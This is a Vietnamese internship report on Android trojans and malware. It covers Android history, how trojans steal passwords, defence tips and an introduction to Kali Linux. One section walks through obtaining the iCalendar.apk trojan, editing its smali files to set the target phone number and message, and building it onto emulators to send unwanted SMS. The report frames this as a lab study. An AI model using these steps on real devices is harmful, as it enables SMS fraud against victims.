nghiên cứu và triển khai các dịch vụ mạng windows server 2008
Thực tập
1. 1
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ
CHÍ MINH
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ
NHIÊN
KHOA ĐIỆN TỬ VIỄN THÔNG
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
TRUNG TÂM ĐÀO TẠO
QUẢN TRỊ MẠNG & AN
NINH MẠNG QUỐC TẾ
ATHENA
BÁO CÁO THỰC TẬP
Đề tài:
Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điên
thoại sử dụng Android và gửi ra ngoài
GVHD: Thầy Võ Đỗ Thắng
SVTH: Nguyễn Hoàng Đức Lâm
MSSV: 1120086
TPHCM, ngày tháng năm 2014
2. Tôi xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên và Khoa Điện Tử
Viễn thông đã tạo điều kiện cho tôi hoàn thành tốt đợt thực tập này. Trong đợt thực tập này
đã cho tôi những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn
trong công việc và môi trường làm việc sau này.
Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân.
Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh
khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể
làm tốt hơn nữa.
2
LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG
Một lần nữa tôi xin chân thành cảm ơn.
TPHCM, ngày tháng năm 2014
Sinh viên thực tập
Nguyễn Hoàng Đức Lâm
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
3. 3
NHẬN XÉT CỦA KHOA
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Trưởng Khoa
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
4. Tôi xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế Athena, cùng
các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy Đỗ Võ Thắng đã nhiệt
tình giúp đỡ và hướng dẫn tôi trong suốt thời gian thực tập tại trung tâm. Thầy đã tạo mọi
điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý kiến
quý báu để hoàn thành tốt bài báo cáo này.
Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân.
Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh
khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể
làm tốt hơn nữa.
4
LỜI CẢM ƠN TRUNG TÂM ATHENA
Một lần nữa tôi xin chân thành cảm ơn.
TPHCM, ngày tháng năm 2014
Chú thích: Hình Giáo viên hướng dẫn (Th.Võ Đỗ Thắng) với sinh viên thực tập (Nguyễn Hoàng Đức Lâm)
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
5. 5
NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TẠI
TRUNG TÂM
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
................................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giảng Viên Hướng Dẫn
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
6. Những nội dung trong báo cáo này là do tôi thực hiện dưới sự hướng dẫn trực
Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả,
Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, tôi xin
6
LỜI CAM ĐOAN
Tôi xin cam đoan:
tiếp của thầy Võ Đỗ Thắng.
tên công trình, thời gian, địa điểm công bố.
chịu hoàn toàn trách nhiệm.
TPHCM, ngày tháng năm 2014
Sinh viên thực tập
Nguyễn Hoàng Đức Lâm
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
7. Trong những năm gần đây, vấn đề “An toàn và bảo mật thông tin” đang ngày càng
nóng. Với sự phát triển đến chóng mặt của các nền tảng do động như iOS, Android,
Windows Phone cùng với nhiều dòng điện thoại thông minh, vấn đề bảo, mật thông tin
chuyển dần xu hướng từ PC sang mobile đặc biệt là Smartphone. Nếu bạn đang sở hữu một
chiếc Smartphone của Apple, Google Nexus, Samsung, Nokia, HTC, Sony,…liệu bạn có
dám chắc chắn là “dế cưng” của mình không bị nhiễm các phần mềm gián điệp, nghe lén
không?. Vì sao lại như vậy?. Vì theo báo cáo gần đây của các hãng phần mềm bảo mật như
Kaspersky Lab, Norton AV, Avast hay BKAV số lượng Smartphone bị nhiễm mã độc ngày
càng tang. Đặc biệt hệ điều hành Android là một hệ điều hành phát triển khá nhanh trong
những năm gần đây, là một mảnh đất béo bở cho các Hacker tấn công. Với sự nhẹ dạ cả
tin, thiêu hiểu biết của người dùng, long tham các thứ “Free” như free app, free wifi đã vô
tình tiếp tay cho các Hacker xâm nhập và cài mã độc trên chính chiếc điện thoại của bạn.
Đề tài “Ngiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách
contact, tin nhắn trên điện thoại Android và gửi ra ngoài” sẽ giúp giúp nghiên cứu tìm hiểu
cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp để phòng tránh.
7
LỜI MỞ ĐẦU
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
8. 8
MỤC LỤC
LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG ..................................................... 2
NHẬN XÉT CỦA KHOA ............................................................................................... 3
LỜI CẢM ƠN TRUNG TÂM ATHENA .................................................................... 4
NHẬN XÉT CỦA G IẢNG VIÊN HƯỚNG DẪN TẠI TRUNG TÂM................. 5
LỜI CAM ĐOAN ............................................................................................................. 6
LỜI MỞ ĐẦU.................................................................................................................... 7
MỤC LỤC .......................................................................................................................... 8
A. GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP .............................................. 9
B. THỰC HÀNH................................................................................................... 11
I. Giới thiệu về Hệ Điều Hành Android......................................................................... 11
II. Giới thiệu Trojan và sử dụng Trojan t ấn công máy android .................................. 13
III.Giới thiệu Malware và sử dụng Malware tấn công máy android.........................19
Phân 1: Làm trên mạng Local Lan.................................................................39
Phần 2: Làm trên môi trường VPS ................................................................46
C. KẾT QUẢ ĐẠT ĐƯỢC................................................................................. 62
D. DANH SÁCH CÁC CLIP........................................................................63
E. TRÍCH DẪN NGUỒN THAM KHẢO....................................................64
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
9. - Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được
thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng
động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp
phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế
mũi nhọn, góp phần phát triển nước nhà.
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản
trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các
hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH... Song song đó,
trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng t heo
đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh
nghiệp, các cơ quan chính phủ, tổ chức tài chính…
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho
nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An,
9
A GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP
Cơ sở 1_Tại TP Hồ Chí Minh:
- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
Cơ sở 2_Tại TP Hồ Chí Minh:
- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.athena.edu.vn or www.athena.com.vn
Điện thoại: (84-8) 2210 3801
Hotline: 0943 20 00 88
- Lĩnh vực hoạt động:
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
10. Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp
tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố
Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn
Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự…
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học
hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các chứng chỉ
quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm
Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc
để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.
Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức
công nghệ mới từ các nước tiên tiến như Mỹ, Pháp, Hà Lan, Singapore và truyền
đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.
10
Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
Đội ngũ giảng viên:
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
11. Tổng công ty Android (Android, Inc.) được thành lập tại
Palo Alto, California vào tháng 10 năm 2003 bởi Andy
Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng
sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears
(từng là Phó giám đốc T-Mobile), và Chris White (trưởng
thiết kế và giao diện tại WebTV) để phát triển, theo lời của
Rubin, "các thiết bị di động thông minh hơn có thể biết
được vị trí và sở thích của người dùng". Dù những người
thành lập và nhân viên đều là những người có tiếng tăm,
Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần mềm
dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một người bạn
thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia vào công ty.
Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một
bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm
Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm
đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự
tính tham gia thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng
đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá
nền tảng này cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ
thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng
cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ
khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất
hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google
muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ
lực làm việc để thực hiện điều này. Các phương tiện truyền thông truyền thống lẫn online cũng
viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Một
vài tờ báo còn nói rằng trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết,
họ đã trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9
năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết Google đã nộp
một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động.
Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp hội
bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn Broadcom, Google, HTC,
Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm, Samsung Electronics,
Sprint Nextel và T-Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết
11
B.Thực hành
I. Giới thiệu về Hệ Điều Hành Android
Lịch sử
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
12. bị di động. Cùng ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên
minh, một nền tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện
thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008.
Biểu tượng của hệ điều hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế
Irina Blok tại California vẽ.
Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ
sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được
đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng; ví dụ như phiên
bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng).
Phiên bản mới nhất (chính thức) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt
loạt thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy
hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong
chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã gia
nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 10, lần lượt do
LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng Nexus là những thiết bị
Android chủ lực của mình, với những tính năng phần cứng và phần mềm mới nhất của Android.
Đặc đi ểm
1. Tính mở. Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng
dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có.
Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện
thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển
tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây
dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa
bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có
thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp
tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo
2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau giữa các
ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để
truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết
bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các nhu
cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng
dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình
thích.
3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng dụng mới và
cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên
điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp
chính xác hơn cho người khác. Với Android, người phát triển có thể xây dựng một
ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi
họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của
MapView và dịch vụ định vị toàn cầu GPS.
4. Xây dựng ứng dụng dễ dàng và nhanh chóng. Android cung cấp bộ thư viện giao diện
lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android
12
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
13. có thể cho phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị
giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm
nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ
dàng.
II. Giới thiệu Trojan và sử dụng Trojan tấn công máy
Trojan - một chương trình dạng virus, một kẻ làm nội gián trong
máy tính của bạn đã giúp cho hacker điều khiển máy tính của
bạn, Trojan giúp hacker lấy những thông tin quý báu của bạn,
thậm chí hắn có thể xóa hoặc định dạng lại cả ổ cứng của bạn
nữa. Trojan có thể nhiễm vào máy của bạn qua tập tin gắn kèm
thư điện tử mà bạn đã vô tình tải về và chạy thử, hoặc có lẫn
trong những chương trình trò chơi, những chương trình mà bạn
không rõ nguồn gốc... Ðể "moi ruột" được mật khẩu của các chủ
thuê bao, hacker nội thường sử dụng virus có họ Trojan gửi đến
các thuê bao cần tấn công thông qua thư điện tử (e-mail) dưới
dạng dữ liệu đính kèm (File Attachment). Chỉ cần khi các chủ thuê bao vô tình mở file này,
lập tức Trojan được kích động và tự động sao chép lại tất cả các thông số về mật khẩu của
chủ thuê bao. Không chỉ là mật khẩu truy cập Intemet mà ngay cả đến mật khẩu của hòm
thư điện tử cũng dễ dàng bị đánh cắp. Ngay sau khi chủ thuê bao kết nối Internet, Trojan
sẽ bí mật sinh ra một e- mail và gửi mật khẩu đánh cắp về cho "tin tặc". Và sau đó mỗi lần
thay đổi mật khẩu virus Trojan sẽ tiếp tục lặng lẽ "tuồn" của ăn cắp tới một địa chỉ mà
hacker nội đã định sẵn.
Ðể đánh lừa "nạn nhân", "tin tặc" luôn tìm cách giăng ra những loại bẫy hết sức tinh
vi. Tinh vi đến nỗi không ít chủ thuê bao dù rất 'kỹ tính" nhưng vẫn cứ "sập" bẫy như
thường. Phổ biến nhất là hacker nội đội lốt những tổ chức hay công ty có uy tín để đánh
lừa chủ thuê bao bằng chương trình phần mềm thư ma Ghostmail. "tin tặc" dễ dàng thảo ra
những e-mail mạo danh với nội dung: "Hiện giờ tình trạng đánh cắp mật khẩu thuê bao
đang rất phổ biến, nhằm để phòng tránh, chúng tôi xin được gửi tới quý khách chương trình
phần mềm Tr-Protect (Vi rút Trojan sau khi đã đổi tên)". Có khi chúng lại "đội lốt" chuyê n
gia lập trình chương trình diệt virus số 1 Việt Nam Nguyễn Tử Quảng: "Ðể phòng chống
virus Chernobyl 26- 4, chúng tôi hân hạnh gởi tới quý ngài chương trình BKAV 383. Mong
quý vị dùng thử Mọi ý kiến đóng góp xin gửi về địa chỉ sau quangnt@it-hut.edu.vn". Khi
13
android.
1. Giới Thiệu
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
14. nhận được những tin kiểu như vậy, có không ít thuê bao dễ dàng "cắn câu" và cứ "tự nhiê n"
cho chạy chương trình vi rút Trojan mà không hề nhận thức được rằng họ đang "tự nguyệ n"
hiến mình thành nạn nhân của bọn "tin tặc".
Như vậy, khi Trojan được kích hoạt trên máy của bạn và khi bạn truy cập Internet thì
Trojan có thể lấy mật khẩu truy cập mạng, lấy danh sách thư điện tử và thậm chí cả cấu
hình máy tính của bạn để gửi cho một địa chỉ thư điện tử của tên tin tặc. Nhưng nguy hiểm
hơn, Trojan còn gửi cả địa chỉ mạng IP, là địa chỉ mà nhà cung cấp dịch vụ mạng (ISP) gán
cho bạn lúc truy cập; tên tin tặc sẽ sử dụng địa chỉ IP của bạn để thiết lập kết nối từ máy
tính của hắn tới máy tính của bạn qua mạng Internet. Trojan sẽ lấy thông tin, xóa thông
tin...
1. Giả danh nhà cung cấp dịch vụ: Hacker lấy danh nghĩa nhà cung cấp dịch vụ
Internet (ISP) gọi điện thoại hoặc gởi e-mail yêu cầu bạn cung cấp password hoặc đổi
password theo họ gợi ý. Hacker mail cho bạn một Attached File (tập tin .exe) cho biết là
file hỗ trợ sử dụng Internet nhưng thực chất đây là file ăn cắp password.
2. Lợi dụng sự tin tưởng khi mượn hoặc sửa chữa máy tính của bạn họ sẽ dễ dàng lấy
3. Cài "gián điệp" vào máy tính của bạn: Ðây là phương thức cổ điển nhưng lại là
cách ăn cắp password thông dụng và hiệu quả nhất mà không tốn công sức, thường là file
Horse Trojan được gởi qua e-mail với những lời mời chào hết sức hấp dẫn, kích thích tò
mò. Nếu bạn mở file này thì ngay lập tức máy bạn đã bị nhiễm virus và từ đó trở đi,
password của bạn được thường xuyên gởi về cho Hacker ngay cả khi bạn thay passwor d
mới.
Ðể đề phòng bị nhiễm Trojan và các loại virus, bạn cần thận trọng khi tải các tập tin
1. Không nên tải và chạy thử những tập tin gắn kèm thư điện tử gửi cho bạn từ những
địa chỉ thư điện tử mà bạn không rõ. Cũng vì lý do này mà tác giả của chương
trình diệt vi rút thông dụng BKAV đã cảnh báo có nhiều kẻ mạo danh gửi cho bạn
chương trình diệt virus mà thực chất là Trojan.
14
Các thủ đoạn của Hacker
mật khẩu vì đa số người sử dụng đều thường xuyên Save Password vào máy.
Ðề phòng, tìm và di ệt Trojan?
trên mạng.
Ðể tìm và diệt Trojan, bạn cần tiến hành theo các bước sau:
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
15. 2. Sử dụng chương trình phát hiện và diệt Trojan, bạn có thể tìm kiếm trên mạng
Internet với từ khóa "Detect and destroy Trojan".
Nếu bạn không có sẵn trong tay những chương trình phát hiện và diệt Trojan thì bạn
có thể kiểm tra Registry của Window: HKEY – LOCAL – MACHINE Software
Microsoft Windows Current Version Run. Nếu thấy có đường dẫn tới một
chương trình mà bạn biết là không phải của Window hoặc của các chương trình tiện
ích, bạn hãy thoát Window về chế độ DOS và xóa tập tin theo đường dẫn của
Registry, vào lại Window và xóa dòng đã ghi trong Registry. Bạn cũng có thể kiểm
tra cả tập tin Win.ini, System.ini trong thư mục C:Windows sau mục Run hoặc
Load.
iCalendar là một phần mềm được tích hợp mã độc có xuất xứ từ Trung Quốc, người
dùng cài đặt chương trình sau khi chạy chương trình sẽ tự động gửi tin nhắn mà không hề
mong muốn. Bằng cách này, điện thoại của nạn nhân sẽ bị trừ tiền mà không rõ nguyên do.
15
2. Hướng dẫn thực hi ện Trojan iCalendar trên Android
Ta mở công cụ supperApk tool, trước đó ta mở 2 máy ảo trước, và công cụ sẽ
scan ra.
Sau đó ta vào Project New Project chọn đến file iCalendar.apk
Các bạn có thể tải iCalendar.apk search google hoặc từ trang
http://search.4shared-china.com/q/CCAD/1/icalendar%20apk?suggested
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
16. Sau khi upload xong dữ liệu thì bạn vào ViewView Smail Code để chỉnh sửa code
16
Tiếp tục vào đường dẫn /com/mj/iCalendar.apk
Chỉnh sửa code của 2 file iCalendar.smali và SmsReceiver.smali
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
17. - File iCalendar.smali , sửa code ở line 252 (số điện thoại của máy ta muốn gửi tin
- File SmsReceiver.smali , ta sửa code ở line 41 thành số điện thoại mà máy mình
17
nhắn) và line 253 (là nội dung tin nhắn)
muốn gửi đến, giống như ở iCalendar.smali
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
18. Sau khi sửa code ta save lại, và Run > Build (nhấn F5): cho phép bắt đầu quá trình cài đặt
trojan iCalendar.apk vào 1 máy ảo Android và gửi tin nhắn tự động đến máy ảo Android
khác.Chỉ cần mở iCalendar lên và ấn vài lần (khoảng 7 lần) là đã có một tin nhắn được gửi đi
mà không mong muốn.
18
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
19. III. Giới thiệu Malware (phần mềm độc hại) và sử dụng
Theo thống kê của các hãng bảo mật trên thế giới thì
hiện các Malware hiện nay mới chỉ dừng lại ở mức độ
xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết
quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần
mềm gián điệp (Trojan) hơn là một virus phá hủy.
- Giai đoạn đầu: Malware được nhúng vào trong một ứng dụng và sẽ chiếm được
quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu
tiên.
- Giai đoạn 2: Malware tự động cài đặt một ứng dụng thứ 2 với một permission đặc
biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các
thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Việc
cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các
ứng dụng mà không được phép.
Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc
lây nhiễm. Ở giai đoạn thứ hai ứng dụng tự động làm một số việc như là confirm, check-in.
Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào (hầu hết vào khoảng
thời gian từ 11h đêm tới 8h sáng ngày hôm sau). Đây là khoảng thời gian mà điện thoại ít
có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc
phát hiện một hành vi bất thường trên chiếc smartphone của mình.
Mục đích của Malware mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người
dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể về sau đã
19
Malware tấn công máy android.
1) Giới thiệu Malware:
Malware (phần mềm ác tính) viết tắt của cụm từ
Malicious Sofware, là một phần mềm máy tính được
thiết kế với mục đích thâm nhập hoặc gây hỏng hóc
máy tính mà người sử dụng không hề hay biết.
Cơ chế hoạt động của Malware
Malware này hoạt động qua hai giai đoạn:
Mục đích của Malware
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
20. kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được
tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng,
việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người
dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra
các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS
gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi
tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này.
Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn
đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị theo dõi, vì
vậy những mối nguy hiểm từ mã độc trên Android đang thực sự đe dọa đến sự an toàn của
người dùng hệ điều hành này.
Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra
bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là
BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử
dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công
bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTr ac k
6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyê n
20
2) Giới thiệu hệ điều hành KaLi Linux
gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.
Sinh viên thực tập: Nguyễn Hoàng Đức Lâm -1120086
21. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ
phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được
các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của
Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ
thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay
đổi mã nguồn của các công cụ.
Tính tương thích kiến trúc
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến
trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có
thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.
Hỗ trợ mạng không dây tốt hơn
